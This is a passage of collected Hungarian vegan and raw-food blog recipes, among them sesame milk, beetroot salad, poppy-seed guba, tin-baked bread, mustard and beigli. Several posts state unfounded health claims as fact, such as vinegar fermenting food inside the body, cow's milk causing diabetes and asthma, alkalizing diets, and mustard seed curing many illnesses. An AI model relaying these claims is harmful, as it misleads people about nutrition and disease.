teszünk akkor szép zöldek maradnak a brokkoli rózsák. Kiolajozzunk egy tepsit, a kész puliszkát ízesítjük a szerecsendióval, préselt fokhagymával, belekeverjük az 1 evőkanál kókusz olajat és beleöntjük a tepsibe. Rátesszük a tetejére a lecsöpögtetett brokkolit, aszalt paradicsomot, sajtot a tetejére és 15-20 percre a sütőbe tesszük 180 C fokon. Összesen 30 perc alatt készen is vagyunk. Én csírát, salátát ajánlok mellé. Utólag meglocsolhatjuk kedvenc hidegensajtolt olajunkkal. Fittanyuka
Vegán őszibarackos krémtúró
2013. január 15. Mindennapi ételeink
Hozzávalók: 1 doboz őszibarackos Alpro szójajoghurt (lehet más ízesítésű is) 3 ek. Alpro natúr joghurt 15 dkg főtt köles 10 dkg natúr tofu 10 dkg nyírfacukor 1 rúd vanília kikapart belseje 1 citrom héja 1 tk. kókuszolaj 1 marék mazsola Elkészítés: Nagyon egyszerű: a főtt kölest (előző este kifőzhetjük, háromszoros mennyiségű vízben) összekeverjük a szójajoghurtokkal, a nyírfacukorral, kókuszolajjal, vaníliával, citromhéjjal, mazsolával és a darabokra vágott, összeturmixolt tofuval. FELHASZNÁLÁSI JAVASLATOK: Nagyon finom: - önmagában, - palacsintába töltve, - túrós batyunak megsütve, -psylliummal kiegészítve túrótortának, -túrófánkba téve, - és végülis szinte bárminek, amibe édes túró töltelék menne :-).
Heti saláta ötlet: zelleres, datolyás narancssaláta
2013. január 14. Napló étkeinkről, életünkről
Tegnap nagyobb fiammal készítettük ezt a salátát, és mindkettőnket meglepett, milyen finom lett. Ételkészítésnél hagyom gyermekeimet kibontakozni, a lányom például finomabb gluténmentes tortákat süt, mint amik a kereskedelemben kaphatók. Jobban belegondolva, érdemes volna közzétenni receptjeit... Visszatérek a salátához. Összetétele nagyon egyszerű: 1 kisebb zeller, 4 nagy narancs, és magozott datolya. A zeller reszeléséhez a karácsonyra kapott végtelen reszelőmet használtam, a narancs és a datolya feldarabolásához egy kés is elég volt. Ez az étel azok közé tartozik, amiknek jól jön egy kis állásidő, mert összeérnek az ízek: a narancs savassága lágyította a zellert, a datolya édessége is szétterjedt, és a zeller fűszeressége átjárta az alkotórészeket! A reszelőmről, ami magyar termék német pengével, az alábbi oldalon látható egy kis film: (a film 2. felében van szó a Julienne reszelőről, és a spirálozási lehetőségről) Mediterranean Julienne Peeler Nagyon megörültem, amikor a karácsonyi vásárban találtam ezt az eszközt, mert 2 oldalas spirálozót 7000 forint alatt nem láttam, ez ugyan csak 1 méretű Julienne-t tud, de 5500 forintért árulták, és másra is használható :-) A filmben látható akkus csavarhúzó nem jár mellé, de én eddig kézzel is könnyen boldogultam!
Avokádós zöld turmix
2013. január 9. Gitta nyersétel blogja
Sokáig csak gyümölcsökkel készítettem zöld turmixot, vagyis zöld leveleket finom édes gyümölcsökkel és vízzel turmixoltam el, ahogy azt Viktoria Boutenkótól tanultuk. Nemrég azonban tanultam egy nagyon finom, nem édes, hanem sós zöld turmixot, amit szeretnék megosztani veletek. Egy pici alma ebben is van, de nem az édes íz a dominál, mint az eddigi zöld turmixokban, hanem inkább a sós. Az avokádó, uborka, spenót... minden összetevője lúgosít... ajánlom minden napra! Zöld ital avokádóval Zöld turmix sósan 1 marék spenót (a biopiacon egész télen kapható) 1/4 kígyóuborka 1/2 avokádó 1 kisebb savanykás alma, vagy 1/2 nagyobb 1 kis marék lucernacsíra 1 csipet só (fontos!) 5 dl víz (vagy mandulatej) A hozzávalókat turmixgépben simára keverjük. Mandulatejjel sokkal finomabb... krémesebb, igazi finomság lesz. A fotón vízzel készült változat van... de akik ott voltak ősszel (október 17-én) dr. Robert Young előadásán Budapesten, a mandulatejes változatot kóstolhatták meg!
Vegán chocolate chip cookies
2013. január 8. Zizi kalandjai
Igen, tudom... miért nem magyarul van megadva a cím?! Valahogy így mondanám: vegán csokoládécseppes kekszek. Nem hangzik rosszul, de fura. Szerintem a chocolate chip cookies már annyira beépült a köztudatba, hogy nagyon sokan ismerik így is (még a Wikipédia is szentel neki egy külön oldalt).
Ezek a kekszek is karácsonyra készültek, bevallom nekem a kedvenceim lettek az öt-hatféle változat közül. Vágytam már igazi amerikai chocolate chip cookies-ra, csak egy kicsit egészségesebb változatban, kevesebb cukorral édesítve és vegánul elkészítve. Nagyon sok recept kering az interneten, nem nehéz találni egy tutit. Vegán változat azonban kevesebb van. Én Emily receptjét vettem alapul, néhány apróságon változtattam, többek között a cukor mennyiségét csökkentettem. Amit pedig először csináltam az az, hogy a kókuszzsírt nem olvasztottam fel hozzá, hanem hagytam megpuhulni szobahőmérsékleten, így a puha kókuszzsírral kevertem ki a nádcukrot, mintha vajat használtam volna. Meg kell mondanom, hogy nagyon tetszett az élmény.
A tésztájába került banán édesít rajta és kicsit puhává teszi a kisült kekszeket. Két héttel később dobozban tárolva még mindig puhák voltak. A két hét nem azt jelenti, hogy ennyire nem ízlett volna, hanem annyi süteményünk, édességünk volt az ünnepek alatt és után, hogy nem győztük I.-vel megenni őket.
Apropó, cukor és édesség. Emlékeztek, hogy tavaly februárban kihívás elé állítottuk magunkat és végig csináltunk egy hardcore 25 napos cukormentes hónapot? Nos, vannak, akik már érdeklődtek nálam, hogy az idén tartanék-e újra cukor- és édességmentes hónapot, mert csatlakoznának a kihíváshoz. Ha lenne kedvetek egy ilyenben részt venni, jelezzétek itt a recept után kommentben. Még az is lehet, hogy valamilyen nyereményért csinálnátok a kihívást és jutalmat kapna a legkitartóbb a kihívás végén! ;) Na, mit szóltok hozzá?
Vegán chocolate chip cookies
Hozzávalók:
- 120 g teljeskiörlésű tönkölyliszt
- 135 g tönköly fehérliszt
- 110 g nádcukor
- 120 g kókuszzsír, puha állagban
- 80 g ét csokibogyó/csokicsepp
- 1 db érett banán, meghámozva, villával pépesre törve
- 1 teáskanál szódabikarbóna
- 1/2 teáskanál só
- 2 evőkanál mandula/rizs/zab/szójatej
- 1 vaníliarúd kikapart magjai
Egy tálban keverjük össze a száraz hozzávalókat: lisztek, szódabikarbóna, só. Egy másik tálban keverjük ki a nádcukrot a puha kókuszzsírral (én most ezt a változatot használtam). Ha már habos a kókuszzsír, adjuk hozzá a banánpépet, a vaníliát és a növényi tejet. Jól keverjük el, majd öntsük a száraz hozzávalókhoz. Adjuk hozzá a csokoládét és keverjük át a tésztát (puha, enyhén ragacsos, de jól formázható tésztát kell kapnunk).
Melegítsük elő a sütőt 180C fokra és béleljünk ki egy nagy tepsit sütőpapírral.
Fagyis- vagy evőkanállal adagoljunk gombócokat a sütőpapírra és egy kicsit lapítsuk le a tetejüket. 15-20 percig süssük, amíg aranybarnák lesznek.
Ebből a mennyiségből kb. 25 db lesz.
Nyers Csokipuding
2013. január 7. Fittanyuka Blog
Ez a recept lett a kedvencem, mert amellett, hogy enzim gazdag, nyers desszert, rendkívül gyorsan elkészíthető. A főzött pudinggal mindig az a problémám, hogy soká hűl ki. Ez azonnal fogyasztható! Hozzávalók: 2 főre 1 db avokádó 4 teáskanál bio kakaópor 2 dl növényi tej, vagy víz ( ezt rátok bízom, hogy nyers növényi tejjel készítitek, vagy dobozos tejjel). 1/2 teáskanál stevia por 1 teáskanál agave szirup vagy méz késhegynyi fahéj vagy bourbon vanília 1/2 citrom reszelt héja 1 teáskanál friss citromlé A megtisztított, kimagozott avokádót alaposan összeturmixoljuk a többi hozzávalóval. Azonnal szervírozható. Én megszórtam dekoráció gyanánt kevés pattogatott amaranttal. Többen kérdeztétek emailben és a facebook oldalon, hogy mivel helyettesíthető a hasonló nyers krémeknél is az avokádó?! Természetesen lehet banánnal is, de én mivel fontosnak tartom a helyes ételtársítás szabályait és előnyben részesítem az alacsony cukortartalmú gyümölcsöket ezért inkább az avokádót javaslom. Vagy ha mégis banánnal készítitek akkor vegyétek figyelembe a magasabb cukor tartalmat és annál kevesebb édesítést használjatok. Továbbá még fontosabbá válik az erjedésgátló fűszerek használata. Ebben az esetben tegyetek több fahéjat, vagy bourbon vaníliát! Fittanyuka
Banántésztás kókusztekercs
Nyers, természetes alapanyagú sütiről van szó, mely tésztájának a nedvességét a banán adja, innen az elnevezés is: “banántészta”, ami nem a hagyományos értelemben vett tészta.
Nem tartalmaz lisztet egyáltalán.
A banántészta alapanyagához összegyúrjuk az alábbi hozzávalókat: 2 banán, és annyi szárazanyag, amennyit felvesz, ez kb. másfél csészényi az alábbiakból: kávédarálón megőrölt kókuszreszelék, mandulatejből megmaradt mandulaliszt (vagy őrölt mandula), kakaópor.
Mandulaliszt készítése: A mandulatej elkészítése után a leszűrt szárazanyagból készül. A nedves mandulapépet egy tálcára tesszük, majd meleg helyen (pl. radiátoron) megszárítjuk. Ha megszáradt, kávédarálóban megdaráljuk, és már készen is van az alacsonyabb zsírtartalmú mandulaliszt. Íme:
Hasonlóképpen kókusztejből megmaradt kókuszzúzalékból is készülhet kókuszliszt, az is felhasználható a sütibe.
Itt pedig az összegyúrt banán-mandulaliszt-őrölt kókuszreszelék-kakaó alapanyagokból készült “tészta”,
ami nem bomba, és nem csokis hógolyó.
Ezt a banántésztát két sütőpapír között kinyújtjuk, és megkenjük a kókuszos töltelékkel:
Kókuszos töltelék: Most nem volt itthon kesudióm, de abból a legfinomabb, legkrémesebb, így mandulát és mogyorót használtam helyette. A mandulát és mogyorót egy kis kókuszreszelékkel, mézzel, vízzel, vanília porral (elhagyható) összeturmixoltam, hogy kenhető masszát kapjak, és rákentem a kakaós banántésztára.
Feltekerjük a tekercset és a fagyasztóba tesszük egy kis időre, hogy keményebb, szeletelhető állagú legyen.
Szeletelés után tálaljuk, én aszalt áfonya lekvárt készítettem hozzá, mely úgy készült, hogy aszalt áfonyát turmixoltam össze egy kis vízzel. Nem kell édesíteni, hiszen az aszalt gyümölcs már eleve édes, koncentrált a cukortartalma. Aszalt áfonya helyett bármilyen más aszalt gyümölcsből elkészíthető. Ha teheted: cukrozatlant és kénezetlent válasz, vagy házi aszalásút.
Nem mind ketchup, ami piros.
És beszéljen a fincsi végeredmény:
Sült majonézes céklasaláta
2013. január 5. Fittanyuka Blog
Nagyon szeretem a céklát és a tormás cékla salátát is, viszont amióta nem fogyasztok és a főzéshez sem használok ecetet, ezt a céklás saláta receptet preferálom a nyers mellett. Életmód tipp: Az ecet egy erjesztett folyamat vége és a folyamat nem szakad meg azután, hogy elfogyasztjuk, az erjedés tovább folytatódik. Az erjedésnek pedig alkohol, savképződés az eredménye. A rossz hír, hogy az ecetes savanyúság mellé elfogyasztott ételt is megerjeszti, hiába egészséges menüként fogyasztottuk el. Tehát az ecetsav egy erősen savas, maró anyag, én csak takarításra használom, tökéletes vízkőoldó szer! Tipp: Bármilyen savanyításhoz, dresszinghez, krémekhez használjunk friss citromlevet. Ez a recept is nagymamám receptje aki szakácsnő volt, ő hagyományos majonézzel készítette, amit természetesen megreformáltam. Szegény nagyim nem érti, hogy miért van szükség erre, csak mosolyog ezeken a furcsaságaimon:). Hozzávalók: 500 g sült cékla 1/2 kk őrölt köménymag 250 ml növényi tejszín 3 evőkanál hidegen sajtolt olíva olaj 1 kk bio mustár 1/2 citrom leve 1 kk himalaya só késhegynyi kurkuma 300 ml víz A céklákat megtisztítjuk, lehéjazzuk és egyenként alufóliába csomagoljuk őket. Előmelegített sütőben 180 C fokon megsütjük. Amikor kihűltek, kicsomagolás után felkockázzuk. Az ecet helyett a következő pác levet készítjük a céklának, hogy tompítsuk az édeskés ízt: A vizet összekeverjük ( annyi vízzel, hogy ellepje) a citromlével, sóval és ebbe áztatjuk 1-2 órát a felkockázott céklákat. Közben elkészítjük a majonézt. A jó minőségű növényi majonézhez a legjobb növényi tejszín a szója tejszín. A hozzáadott olaj hatására sűrűsödik, az olajat apránként adjuk hozzá és folyamatosan keverjük, hozzáadjuk a fűszereket, a mustárt csak az íze kedvéért. Ha nem találjuk elég sósnak a végeredményt utólag még sózhatjuk ízlés szerint. Majd a lecsöpögtetett céklát belekeverjük a majonézbe és 1-2 órára a hűtőben pihentetjük, hogy összeérjenek az ízek. Ideális fasírtokhoz, vegaburgerhez, pirított tönköly kenyérhez, pitához, tortillához! Fittanyuka
új év, új energiák
2013. január 3. Vegasztrománia
honnan is kezdjem.. először is mindenkinek nagyon boldog új évet, legalább annyira jót, mint volt! nekem sikerült kipihennem a fáradalmakat családos, barátos programokkal, budapesten és a káli-medencében. ötleteim töretlenül várnak a megvalósításra, és az inspiráció, múzsák is új erőre kaptak. nem titok, hogy civilben a kisképzőben tanítok. az sem titok, hogy alkalomadtán (ahogy időm és energiám engedi) kiállításokat szervezek; gyengéim a kortárs, fiatal művészek, friss energiák, szokatlan helyszínek. moravszki katát ugyan nem tanítottam, de a kisképző gellért-hegyi kollégiumában sokszor kaptam fel a fejem entrée-jára; a jellegzetes, sok decibeles katahang kb fél perccel előbb érkezett, mint kata és gesztusai. grafikus vénája, humorral átitatott, élettel teli, néhol groteszk hangja is elöl jár, és tavaly óta elég sokat dolgoztunk együtt (a jelen és jövő idő is beilleszthető) kiállításokon, pop-up store dekoráláson, és katának köszönhetem a konyhám egyik falának illusztrációját is (ha jók lesztek, egyszer megmutatom). kata közben a kisképzőről átváltott a nagyképzőre, és töretlen lelkesedéssel alkot. s hogy kapcsolódik a művészet a gasztronómiához? hogyan tudok fiatal művészeket népszerűsíteni és közben a vegasztrománia design-oldalát is fejleszteni? közös nevezőként összekapcsolom a számomra fontos vonalakat, és ez az együttműködés nekem nagyon tetszik. első körben katával az egyik legnépszerűbb receptet választottuk. gyönyörködjetek, főzzetek! moravszki kata http://katamoravszki.tumblr.com ui: ez csak a kezdet, folyt.köv!
Almás-narancsos mákos guba jénaiban megsütve
Legtöbben karácsony idején készítenek mákos gubát. Való igaz, hogy én is ritkán jutok erre az elhatározásra. Ráadásul amióta házas vagyok, vagyis évek óta, mákos gubát most először készítettem. Eddig, ha guba volt, akkor inkább diós, esetleg mogyorós készült - hasonló elv alapján, csak sütés helyett tejszínhabbal. A tejszínhabos megoldásra még azoknál a szomszédoknál "szoktunk" rá, akik abban a bizonyos vízparti városban voltak az utolsó házunknál a szomszédaink, ahol a férfi halászember volt. Ők kínáltak meg diós gubával - tejszínhabbal a tetején egyik karácsonykor. Ugyanis amikor ott éltünk, szokás volt "szomszédolni" karácsony második ill. harmadik napján. Sőt szilveszter-újév idején is. De egy nagyobb városban már legfeljebb azok között terjedt el ez a szokás, akik réges régóta élnek egy társasházban... S azoknál sem feltétlen. 5 évig laktunk egy csinos, kerttel és pázsittal rendelkező társasházban, ahol összesen 6 lakás volt. De senki nem járt át a másikhoz karácsonyi vagy újévi köszöntésre. Hiába, ez már a nagy főváros volt, ahol az emberek sokkal zárkózottabbak. Igaz, mi minden karácsony alkalmával helyeztünk valami kis "gasztro-ajándékot" az ajtajuk kilincsére.
Szóval most következzen egy mákos guba recept, ami egy igazi kalciumbomba - köszönhetően a máknak, és a szezámtejnek, amivel készült.
A recept:
Hozzávalók:
- 6-8 kifli felkarikázva, megszárítva
- 1 narancs héja lereszelve
- 3 kisebb alma lereszelve
- néhány kanál mák (ki mennyire szereti édesen)
- kb. 1,2 l növényi tej (jelen esetben banános szezámtej)
- édesítőszer (stívia, gyümölcscukor, xilit, nyírfacukor, méz stb.)
- kókuszzsír
Elkészítés:
A felkarikázott kifliket egy széles, nagy tálba tesszük. 2 dl tejet félre teszünk. Az előre elkészített darált mák felével összekevert növényi tejjel meglocsoljuk. Érdemes egy sor kiflit letenni, meglocsolni, következő sort rá, ismét meglocsolni, míg a kiflikarikák el nem fogynak. Próbáljunk minden kiflidarabot egyenlően meglocsolni a tejjel. Kicsit állni hagyjuk, majd egy jénai tálat (vagy más tűzállót) egy kevés kókuszzsírral kikenünk. A gubakiflikből egy sort a tálba fektetünk. Megszórjuk az édesített darált mákkal, meghintjük egy kevés narancsreszelékkel (narancsot reszelés előtt megmostuk!) és a reszelt alma egy részével befedjük. Ismét kiflikarikákat teszünk le egy sorba. Addig haladunk, míg minden el nem fogy. (Beosztva, hogy minden szintre egyenlő mák, narancsreszelék és alma jusson.) A végén, a lereszelt narancsot a maradék, félre tett szezámtejbe csavarjuk, ha szükséges kicsit édesítjük és meglocsoljuk vele a lerakott kifliket úgy, hogy az edény szélén jusson az alsóbb kiflikre is. Sütőben megpirítjuk. Kb. 20-30 perc alatt készre sül. Nekem kicsit "megkelt", mint egy kelt tészta ez a "gubarakottas", de ahogy hűlt ki, úgy nyerte vissza eredeti, alacsonyabb formáját. Nagyon sokat készítettem, ketten nem tudtunk volna ennyivel megbirkózni, így karácsonykor vittünk magunkkal a vendégségbe is. Szerintem szilveszterre is remek étel lehet.
Banános szezámtej
Nem is olyan rég bemutattam a szezámmag előnyeit, és leírtam, tehéntej helyett miért inkább szezámtejet fogyasszunk. A szezámtejet, akárcsak a többi növényi tejet fel lehet dobni különböző intenzív ízű gyümölcsökkel. Ezek még nem turmixok, hanem a tejeknek adunk ízt, mintha a tehéntejhez kakaót adnánk. A szezámnak van egy jellegzetes íze és finom illata. Ezt lehet felülmúlni egy banán hozzáadásával. Nyáron persze banán helyett használhatunk jó érett sárgabarackot. Most a banános receptet mutatom meg. Csak némi változtatás szükséges hozzá a natúr szezámtejhez képest.
A recept:
Hozzávalók:
- 1 nagyobb marék szezámmag
víz
só
1-2 banán (jó érett)
Elkészítés:
A szezámmagot néhány órára, vagy akár egy éjszakára beáztatjuk. Kb. kétszeres mennyiségű vízbe. Az áztatás után a magokat átszűrjük és az átszűrt víz felével összeturmixoljuk. Jó, ha erős turmixunk van (500W), mert azzal talán 2 perc alatt egy sűrűbb masszát kapunk. Ezt akár át is szűrhetjük, de nem szükséges (én nem szoktam, mert a szezámszemek alig érezhetőek a lében) vagy egyszerűen a banánokat hozzádarabolva úgy 1-2 2-3 dl vízzel felhígítva, csipetnyi sót hozzáadva még egy kis ideig turmixoljuk. Ezzel kész a banános szezámtejünk. Szerintem a banán annyira megédesíti, hogy nem szükséges bele sem méz, sem cukorféle. De ha valaki édesszájú, még fokozhatja. (Akár 1-2 db aszalt datolya beleturmixolásával is). Ebbe nem került vanília, de az íz rajongói tehetnek hozzá. Inkább csipetnyi fahéjjal szórhatjuk meg italunk tetejét.
Rusztikus kalózkenyér (konzervben megsütve)
Kalózkenyér. Sok évvel ezelőtt, házasságunk első hónapjaiban az egyik áruházlánc polcain fedeztünk fel egy sok magvas kenyeret. Kalózkenyérnek hívtuk. Már nem emlékszem, hogy valóban ez volt a valódi neve, vagy csak mi adtuk neki. Kerek hosszúkás formában sütötték. Napraforgó, tökmag és lenmag tuti voltak benne. A neten többfelé láttam különböző gasztroblog-gyűjtő oldalakon, hogy többen megpróbálkoztak a "konzervben sütéssel". ÓÓÓ ezt nem hagyhattam ki én sem! Bár van néhány szebbnél szebb sütőformám, na de a konzerv, az valami egészen más. :) Mielőtt a receptet leírnám, el kell mondanom, hogy igazából a képen látható művek a férjem érdemei. Ugyanis ezek is "gasztro-ajándékként" karácsonyra készültek a rokonságnak. S míg Ő könnyedén (apró kis segítséggel) létrehozta ezeket a mesterműveket, addig én is el voltam foglalva egyéb karácsonyi tevékenységgel. Szóval Hölgyeim és Uraim, tekintsék meg férjem által készített kalózkenyereket. Mobilomon kikerestem a blogomról a kenyér-alapreceptjét, és csak annyit mondtam neki, hogy ez alapján biztos el tudja készíteni. Emellett még összekevertem neki egy pohárkában a magokat, amelyeket hozzáadott - kicsit megőrölve.
A recept:
Hozzávalók:
- 2,7 dkg friss élesztő
- 3,7 dl meleg víz (magok miatt több kell, mint általában)
- 25 dkg teljes kiőrlésű liszt
- 35 dkg fehér liszt (BL-55)
- 1 evőkanál olaj (magok miatt elég picit kevesebb, mint általában)
- 1 dkg só
- 3 dkg lenmag
- 3 dkg szezámmag
- 3 dkg napraforgómag
- 2 dkg tökmag
- 2 dkg dió
- 2 dkg mogyoró
Elkészítés:
A kenyérsütő üstjébe belemorzsoljuk az élesztőt, majd ráöntjük a meleg vizet.
Várunk egy rövid ideig, míg az élesztő feloldódik a víz tetejére. Ha cukrot, vagy mézet is (vagy egyéb édesítőt) raktunk hozzá, akkor az élesztő a víz felszínére kel. Ennek hiányában csak feloldódik.
Közben elővesszük a többi hozzávalót.
Mikor feloldódott az élesztő, a fenti sorrendben hozzáadjuk a többi anyagot is. Téli napokon figyeljünk arra, hogy a liszt meleg legyen. Sütés előtt érdemes a hideg kamrából (ha ott van) elővenni és a fűtőtesten kicsit melegíteni (edényben vagy papírban).
Beletesszük a kenyérsütő gépbe a hozzávalókat és a dagasztó-kelesztő programra tesszük be. Az így megkelt és elkészült nyers tésztát margarinnal vagy kókuszzsírral kikent, kevés liszttel megszórt konzervdobozban sütjük ki. Margarin vagy kókuszzsír helyett sütőpapírt is használhatunk. A konzervek jelen esetben egy barack és három babkonzerv voltak, amelyeket hetekkel ezelőtt használtam fel. Mosogatógépben fertőtlenítve mostuk el őket.
Csípős diós mustár
2012. december 28. Zizi kalandjai
Ez a mustár tavaly és az idén is bekerült a gasztro ajándékok sorába a nagy sikerre való tekintettel. Igaz karácsony már elmúlt azonban közeledik szilveszter, amikor sok-sok virsli (szójavirsli :)) kerül az asztalokra és jól jön mellé a házi készítésű pikáns diós mustár. Készíthetjük saját magunknak vagy ajándékba és vihetjük magunkkal a szilveszteri buliba.
A mustárfű magja a mustármag, amelyből készül maga a fűszer, a mustár. Két fajtája van a fehér (angol) és a fekete (francia) mustár. A fehér mustár magját házigyógyszerként, sokféle betegség (érelmeszesedés, magas vérnyomás, anyagcserezavarok, epe- és májbántalmak, emésztési problémák, felfúvódás, reuma stb.) kúrálására használják.
Néhány alapanyag kell csak hozzá, egy kis üveg és 12 órát kell hűtőben tartani használat előtt. Az egyetlen különleges hozzávaló a mustárpor, bár magunk is nekiállhatunk mustármagot őrölni. Én Colemans mustárport használtam, amelytől igazán csípős lett a végtermék, de nagyon finom.
A receptet a barátnőmtől, Giulia-tól tanultam.
Csípős diós mustár
Hozzávalók:
- 50 g mustárpor
- 50 g dió, felaprítva
- víz
- 1 evőkanál folyékony méz
- 3 evőkanál almaecet
- 5 csipet só
- kis üveg (kb. 200-250 ml-es)
Tegyük egy tálkába a mustárport és lassan adagoljuk hozzá a vizet, amíg eléri a kívánt konzisztenciát (kb. 6-10 evőkanál víz, attól függően mennyire szeretnénk folyékonyra vagy sűrűre a mustárunkat). Keverjük hozzá az aprított diót. Ízesítsük sóval, mézzel, almaecettel.
Tegyük sterilizált üvegbe és tartsuk hűtőben. Várjunk 12 órát használat előtt.
Szezámtej (Házilag)
Azt mondják, a tej sok kalciumot tartalmaz. Ha van is a tejben kalcium, mégis a szervezet számára hasznosíthatatlan körülmények között. Rendszeres tejivók között a legelterjedtebb az allergia, gyakori fül-, és mandulafertőzések, asztma, bélproblémák és cukorbetegség. Arról nem beszélve, hogy napjaink állatait is különböző antibiotikumokkal kezelik az életben maradásért. Tényleg ilyen tejet akarunk fogyasztani? Én biztos vagyok benne, hogy ha valaki elkezd otthon növényi tejeket készíteni, főleg, ha kicsit ízesíti is azokat, akkor könnyen egészséges szokást alakíthat ki. S mindezt miért írtam le? Mert a szezámtej talán az egyik leggazdagabb kalciumforrás az emberi szervezet számára. Mégis oly kevesen élnek vele. Bizony nem ártana kicsit elterjedtebbé tenni. Fontos szót ejteni arról is, hogy a szezám a kalcium mellett magnézium, kálium, foszfor, vas, A-, E-, B1-, B2-, niacin vitaminok forrása is a szervezet számára.
A recept:
Hozzávalók:
- 1 nagyobb marék szezámmag
víz
só
édesítő szer (stívia, gyümölcscukor, méz, stb)
esetleg egy kevés kikapart vanília
Elkészítés:
A szezámmagot néhány órára, vagy akár egy éjszakára beáztatjuk. Kb. kétszeres mennyiségű vízbe. Az áztatás után a magokat átszűrjük és az átszűrt víz felével összeturmixoljuk. Jó, ha erős turmixunk van (500W), mert azzal talán 2 perc alatt egy sűrűbb masszát kapunk. Ezt akár át is szűrhetjük, vagy egyszerűen vízzel felhígítva, csipetnyi sót, esetleg kikapart vaníliát és valamilyen édesítőszert hozzáadva még egy kis ideig turmixoljuk. Ezzel kész a natúr szezámtejünk.
Fóliában sült szójavagdalt kápia paprikával
Néha napján férjemre várakozva be-be tévedek egy-egy könyvesboltba, ahol magamba szívom mindazt, ami érdekel. Át és átlapozok különféle irodalmat, amire egyrészt alig jutna máskor időm, másrészt, pénzt nem szívesen adnék ki ezekért a könyvekért. Tévedés ne essék, olvasok rendszeresen. Most az egyik könyv például a Nyers étel csodája, amit bánom, hogy nem nyáron vettem kezembe, vagy jobban mondva töltöttem fel a mobilomra, mert elektronikus formában szereztem meg, így utazásaim közben (pl. munkába menet) szívesen olvasom. Na de a könyvesboltokra visszatérve - azokat a szakácskönyveket is átlapozgatom, amelyek telis-tele vannak húsos ételekkel. Vagy nem kizárólag azokkal. Például legutóbb Hegyi Barbara és Kulka János szakácskönyveit nézegettem. Mindkettőt nagyon kedvelem. Barbarát már jó néhány darabban láthattam. A hangja egy megismételhetetlen fűszer a magyar színészgárdában. :) Van még néhány ilyen jellegzetes hang, arc, tehetség. Úgy gondolom, mindkettőjük - Kulka és Hegyi - nem manapság divatos celebek, hanem a tényleges tehetségükkel, művészetükkel íródtak be az emberek tudatába. Szóval ilyesmi - képekkel, út-, vagy élményleírásokkal gazdag könyvekből nagy ritkán "ötletet lopok". Így született meg a mostani remekművem is. Minőségét jelezte, hogy odáig volt érte a férjem. (Ja, és azt hiszem, nem a fent említett emberek tollából loptam az ötletet, hanem egy harmadik szakácskönyvből, ahol darált hússal készítette el a szakács.)
A recept:
Hozzávalók:
1 csomag (20 dkg) szójagranulátum
1 nagyobb marék (vagy valamivel több) zabpehely
4 evőkanál sörélesztő pehely
1 hagyma
3-4 gerezd fokhagyma
1 piros színű kápia paprika (vagy kaliforniai)
1 zöld színű kápia paprika (vagy kaliforniai)
zeller zöldje
petrezselyem levél
ételízesítő
alufólia
víz
olaj
Elkészítés:
A szójagranulátumot ételízesítős meleg vagy forró vízben áztatjuk legalább fél órát, de akár többet is. Amikor megpuhult és átjárta az ételízesítő íze, átszűrjük, kinyomkodjuk, de a levét megtartjuk, nem öntjük ki!!!
A szójagranulátumot egy kevés vízen megfuttatott hagymával összekeverjük, kicsit átfőzzük, hozzáadjuk a fokhagymákat is. (Hozzányomjuk, vagy apróra vágva.) A paprikákat apróbb darabokra felvágjuk, szintén a szójához adjuk, a zeller zöldjét és a petrezselyem leveleket apróra vágva szintén belekeverjük. Sörélesztő- és zabpehely kerül még hozzáadásra. Annyi zabpelyhet kell hozzáadni, hogy a szója nedvességét jól felszívja, és az egész massza összeálljon, képesek legyünk nagyobb gombócokat formálni belőlük.
Tepsink hosszának megfelelő méretben alufóliából egy nagyobb darabot letépünk. Erre halmozzuk rá a massza egy részét (felét), úgy, hogy rudat tudjunk formálni belőle a kezünkkel. Amikor a rúd egybeállt, egy kevés olajat végigcsurgatunk rajta, majd az alufóliával betakarjuk és a tepsibe tesszük. A maradék masszával hasonlóan járunk el. Amikor mindkét rudunk a tepsiben pihen, a szójából leszűrt fűszeres folyadékkal felöntjük a tepsit és sütőben kb. 35 perc alatt készre sütjük, jobban mondva pároljuk.
A lé nagy része elpárolódik, elfő alóla, ha mégis marad, akkor azt már nem használjuk fel. A fóliákat szétnyitjuk, kicsit engedjük, hogy a maradék gőz és pára távozzon, majd amikor már nem túl forró, egy óvatos, de gyors mozdulattal, a fólia segítségével átemeljük a tálcánkra vagy tálunkra a kész vagdaltat.
Krumplipüré és sok sok saláta fogyott hozzá. Máskor is el fogom készíteni. Szerintem még ünnepekre, vagy karácsonyra, húsvétra is kitűnő vendégváró falat.
Aszalt, nyers mézeskalács
Zabtejből megmaradt törmelékből most mézeskalácsot készítettem.
Nem sütöttem, csak aszaltam néhány óra hosszat. Finom, ropogós állagú lett, ízre pedig finom kategória.
Természetesen liszt-, cukor-, tej-, margarin-, és egyéb adalékanyag mentes.
Elkészítés: Zabtejből megmaradt törmelékhez az alábbi hozzávalókat adtam: kávédarálóban finommá őrölt kókuszreszelék, zabpehely őrlemény, mézeskalács fűszerkeverék, méz, őrölt dió. Az arányok lényegtelenek, édesítés ízlés szerint. A lényeg, hogy egy gyúrható, tésztaszerű masszát kapjunk, amit kinyújtunk sodrófával két sütőpapír között, majd szaggatóval kiszaggatjuk.
Magokkal díszítjük. (pl. tökmag, napraforgó mag, szezámmag, mandula, chia mag… stb.)
Néhány óra hosszat aszaljuk (én kb. 3-4 órát aszaltam).
Jó étvágyat!
Beigli torta - Tej,-tojás,-cukor,-élesztőmentes
2012. december 21. Fittanyuka Blog
Karácsony elképzelhetetlen beigli nélkül, igazi hungarikum. A Karácsonyi Fittanyuka főzőtanfolyamon készítettük el. Az alábbi változat, mondhatni kettő az egyben, ugyanis egy sütéssel rögtön kétféle ízben készítjük ez a finomságot. Nincs repedés, hasadás, mint általában a beigli sütésnél. Különlegessége ennek a beiglinek, hogy minden szempontból megfelel a nem savasító sütik kritériumainak. Nincs benne élesztő, cukor és semmi tej,-tojás. Így bátran elkészítheti és fogyaszthatja az is aki cukorbeteg, candidás, vagy lúgosítani szeretne , de azért karácsonykor nem szívesen hagyja ki a beiglit! Hozzávalók: Tészta: 430 g világos tönköly liszt 200 g nem hidrogénezett bio margarin 40 g nyírfa cukor 1,2 dl víz vagy növényi tej 1 zacskó foszfát mentes sütőpor 1 csipet só Dió töltelék: 300 g darált dió 80 g nyírfa cukor 1 db narancs reszelt héja és leve 1 dl növényi tej 3 evőkanál cukormentes sárgabarack lekvár 1kk alma sűrítmény 1 kk vanília kivonat Mák töltelék: 300 g darált mák 80 g nyírfa cukor 30 g áztatott mazsola 1/2 citrom leve és héja 2 db reszelt alma 1 dl növényi tej kk vanília kivonat Puding krém ( elhagyható) 1 tasak vaníliás bio puding por 1 evőkanál nyírfa cukor 300 ml növényi tej Torta 